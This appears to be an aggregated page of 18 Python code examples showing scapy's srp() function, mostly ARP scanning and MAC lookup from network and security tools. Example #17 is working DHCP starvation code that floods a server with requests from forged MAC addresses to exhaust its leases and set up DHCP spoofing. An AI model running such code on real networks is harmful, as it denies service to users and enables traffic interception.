Python scapy.all.srp() Examples
The following are 18
code examples of scapy.all.srp().
You can vote up the ones you like or vote down the ones you don't like,
and go to the original project or source file by following the links above each example.
You may also want to check out all available functions/classes of the module
scapy.all
, or try the search function
.
.
Example #1
| Source File: network_scanner.py From Wifi_BruteForce with GNU General Public License v2.0 | 12 votes |
|
def scan_ips(interface='wlan0', ips='192.168.1.0/24'):
"""a simple ARP scan with Scapy"""
try:
print('[*] Start to scan')
conf.verb = 0 # hide all verbose of scapy
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
arp = ARP(pdst = ips)
answer, unanswered = srp(ether/arp, timeout = 2, iface = interface, inter = 0.1)
for sent, received in answer:
print(received.summary())
except KeyboardInterrupt:
print('[*] User requested Shutdown')
print('[*] Quitting...')
sys.exit(1)
Example #2
| Source File: arp_scanner.py From WiFiSpy with GNU General Public License v3.0 | 6 votes |
|
def SCAN_NETWORK(MAC_ADDRESS, IP_RANGE, INTERFACE):
print("[+] Scanning network ... \n")
start_time = datetime.now()
conf.verb = 0
if MAC_ADDRESS == "None":
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = IP_RANGE), timeout = 2, iface=INTERFACE,inter=0.1)
else:
ans, unans = srp(Ether(src=MAC_ADDRESS, dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = IP_RANGE), timeout = 2, iface=INTERFACE,inter=0.1)
for snd,rcv in ans:
try:
hostname = socket.gethostbyaddr(str(rcv[ARP].psrc))[0]
print(rcv.sprintf(r"%ARP.psrc% ["+color.CYAN+color.UNDERLINE+hostname+color.END+"] - %Ether.src%"))
except:
ERROR_print("Error occured while scanning!")
MAIN(IP_RANGE, SPOOF_MAC, INTERFACE)
stop_time = datetime.now()
total_time = stop_time - start_time
print("\n")
print("[*] Module Completed!")
print("[*] Scan Duration: %s \n" %(total_time))
Example #3
| Source File: network_scanner.py From hacking_tools with MIT License | 6 votes |
|
def scan(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1,
verbose=False)[0]
clients_list = []
for element in answered_list:
client_dict = {"ip": element[1].psrc, "mac": element[1].hwsrc}
clients_list.append(client_dict)
return clients_list
Example #4
| Source File: network_scanner.py From arissploit with GNU General Public License v3.0 | 5 votes |
|
def scan():
try:
print(colors.purple+"Interfaces:"+colors.end)
for iface in netifaces.interfaces():
print(colors.yellow+iface+colors.end)
interface = input("\033[1;77m[>]\033[0m Interface: ").strip(" ")
try:
ip = netifaces.ifaddresses(interface)[2][0]['addr']
except(ValueError, KeyError):
printError("Invalid interface!")
return
ips = ip+"/24"
printInfo("Scanning...")
start_time = datetime.now()
conf.verb = 0
try:
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst = ips), timeout = 2,iface=interface,inter=0.1)
except PermissionError:
printError('Permission denied!')
return
for snd,rcv in ans:
print(rcv.sprintf(colors.yellow+"r%Ether.src% - %ARP.psrc%"+colors.end))
stop_time = datetime.now()
total_time = stop_time - start_time
printSuccess("Scan completed!")
printSuccess("Scan duration: "+str(total_time))
except KeyboardInterrupt:
printWarning("Network scanner terminated.")
Example #5
| Source File: terkin.py From terkin-datalogger with GNU Affero General Public License v3.0 | 5 votes |
|
def arp_ping(self, destination):
"""
The fastest way to discover hosts on a local
ethernet network is to use the ARP Ping method.
-- https://scapy.readthedocs.io/en/latest/usage.html#arp-ping
:param destination: Network to scan.
:param delay: How long to delay before starting the network scan.
"""
log.info('Sending ARP ping request to {destination}'.format(**locals()))
# "srp" means: Send and receive packets at layer 2.
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=destination), timeout=10, verbose=self.VERBOSITY)
return ans, unans
Example #6
| Source File: arp.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())
Example #7
| Source File: dns.py From kube-hunter with Apache License 2.0 | 5 votes |
|
def get_kube_dns_ip_mac(self):
config = get_config()
kubedns_svc_ip = self.extract_nameserver_ip()
# getting actual pod ip of kube-dns service, by comparing the src mac of a dns response and arp scanning.
dns_info_res = srp1(
Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()),
verbose=0,
timeout=config.network_timeout,
)
kubedns_pod_mac = dns_info_res.src
self_ip = dns_info_res[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"), timeout=config.network_timeout, verbose=0,
)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:
return response[ARP].psrc, response.src
Example #8
| Source File: utils.py From creak with GNU General Public License v3.0 | 5 votes |
|
def get_mac_by_ip_s(ip_address, delay):
"""try to retrieve MAC address associated with ip using Scapy library """
responses, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip_address),
timeout=delay, retry=10)
# return the MAC address from a response
for _, response in responses:
return response[Ether].src
return None
Example #9
| Source File: cmd_arp_ping.py From habu with BSD 3-Clause "New" or "Revised" License | 5 votes |
|
def cmd_arp_ping(ip, iface, verbose):
"""
Send ARP packets to check if a host it's alive in the local network.
Example:
\b
# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=ip), timeout=2)
for _, pkt in res:
if verbose:
print(pkt.show())
else:
print(pkt.summary())
Example #10
| Source File: cmd_dhcp_discover.py From habu with BSD 3-Clause "New" or "Revised" License | 5 votes |
|
def cmd_dhcp_discover(iface, timeout, verbose):
"""Send a DHCP request and show what devices has replied.
Note: Using '-v' you can see all the options (like DNS servers) included on the responses.
\b
# habu.dhcp_discover
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
conf.checkIPaddr = False
hw = get_if_raw_hwaddr(conf.iface)
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
ip = IP(src="0.0.0.0",dst="255.255.255.255")
udp = UDP(sport=68,dport=67)
bootp = BOOTP(chaddr=hw)
dhcp = DHCP(options=[("message-type","discover"),"end"])
dhcp_discover = ether / ip / udp / bootp / dhcp
ans, unans = srp(dhcp_discover, multi=True, timeout=5) # Press CTRL-C after several seconds
for _, pkt in ans:
if verbose:
print(pkt.show())
else:
print(pkt.summary())
Example #11
| Source File: mitm_utility.py From pentesting-multitool with GNU General Public License v3.0 | 5 votes |
|
def mac_getter(self, IP):
# Sending ARP for take the MAC address
ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=IP), timeout=2, iface=self.interface, inter=0.2)
for send, receive in ans:
return receive.sprintf(r"%Ether.src%")
Example #12
| Source File: arp_spoofer.py From vault with MIT License | 5 votes |
|
def getMAC(self, IP, name):
"""
Fetches MAC address of the selected IP
"""
arp_packet = scapy.ARP(pdst=IP)
broadcast = scapy.Ether(dst='ff:ff:ff:ff:ff:ff')
arp_broadcast = broadcast/arp_packet
broadcast = scapy.srp(arp_broadcast, timeout=1, verbose=False)[0]
mac_addr_str = self.capture_output(broadcast)
mac_addr = re.findall(r'\w\w:\w\w:\w\w:\w\w:\w\w:\w\w',
mac_addr_str)[0]
mac_addr = str(mac_addr).strip()
colors.success('Found MAC address for {} : {} is : {}'
.format(name, IP, mac_addr))
val = str(input('>> Enter(Y/y) to continue or enter MAC address : '))\
.strip()
if val == 'Y' or val == 'y':
return mac_addr
elif self.validateMAC(val):
colors.info('Setting MAC address for {} : {} : {}'
.format(name, IP, val))
return val
else:
colors.error('Please enter a valid MAC address...')
self.getMAC(IP, name)
Example #13
| Source File: util.py From upribox with GNU General Public License v3.0 | 5 votes |
|
def get_mac6(ip, interface):
"""Returns the according MAC address for the provided IPv6 address.
Args:
ip (str): IPv6 address used to get MAC address.
interface (str): Interface used to send neighbor solicitation.
Results:
According MAC address as string (11:22:33:44:55:66)
or None if no answer has been received.
"""
ans, unans = srp(Ether(dst=ETHER_BROADCAST) / IPv6(dst=ip) / ICMPv6ND_NS(tgt=ip), timeout=2, iface=interface, inter=0.1, verbose=0)
for snd, rcv in ans:
return rcv.sprintf(r"%Ether.src%")
Example #14
| Source File: util.py From upribox with GNU General Public License v3.0 | 5 votes |
|
def get_mac(ip, interface):
"""Returns the according MAC address for the provided IP address.
Args:
ip (str): IP address used to get MAC address.
interface (str): Interface used to send ARP request.
Results:
According MAC address as string (11:22:33:44:55:66)
or None if no answer has been received.
"""
ans, unans = srp(Ether(dst=ETHER_BROADCAST) / ARP(pdst=ip), timeout=2, iface=interface, inter=0.1, verbose=0)
for snd, rcv in ans:
return rcv.sprintf(r"%Ether.src%")
Example #15
| Source File: arp_spoof_detector.py From hacking_tools with MIT License | 5 votes |
|
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1,
verbose=False)[0]
return answered_list[0][1].hwsrc
Example #16
| Source File: arp_spoofing.py From hacking_tools with MIT License | 5 votes |
|
def get_mac(ip):
arp_request = scapy.ARP(pdst=ip)
broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
arp_request_broadcast = broadcast/arp_request
answered_list = scapy.srp(arp_request_broadcast, timeout=1,
verbose=False)[0]
return answered_list[0][1].hwsrc
# Change mac address in arp table
Example #17
| Source File: cmd_dhcp_starvation.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
|
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
"""Send multiple DHCP requests from forged MAC addresses to
fill the DHCP server leases.
When all the available network addresses are assigned, the DHCP server don't send responses.
So, some attacks, like DHCP spoofing, can be made.
\b
# habu.dhcp_starvation
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
conf.checkIPaddr = False
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
ip = IP(src="0.0.0.0",dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
dhcp = DHCP(options=[("message-type","discover"),"end"])
while True:
bootp = BOOTP(chaddr=str(RandMAC()))
dhcp_discover = ether / ip / udp / bootp / dhcp
ans, unans = srp(dhcp_discover, timeout=1) # Press CTRL-C after several seconds
for _, pkt in ans:
if verbose:
print(pkt.show())
else:
print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))
sleep(sleeptime)
Example #18
| Source File: cmd_gateway_find.py From habu with BSD 3-Clause "New" or "Revised" License | 4 votes |
|
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose):
"""
Try to reach an external IP using any host has a router.
Useful to find routers in your network.
First, uses arping to detect alive hosts and obtain MAC addresses.
Later, create a network packet and put each MAC address as destination.
Last, print the devices that forwarded correctly the packets.
Example:
\b
# habu.find.gateway 192.168.0.0/24
192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2)
neighbors = set()
for _, pkt in res:
neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc))
for mac,ip in neighbors:
if tcp:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout)
else:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout)
for _,pkt in res:
if pkt:
if verbose:
print(pkt.show())
else:
print(ip, mac, conf.manufdb._get_manuf(mac))
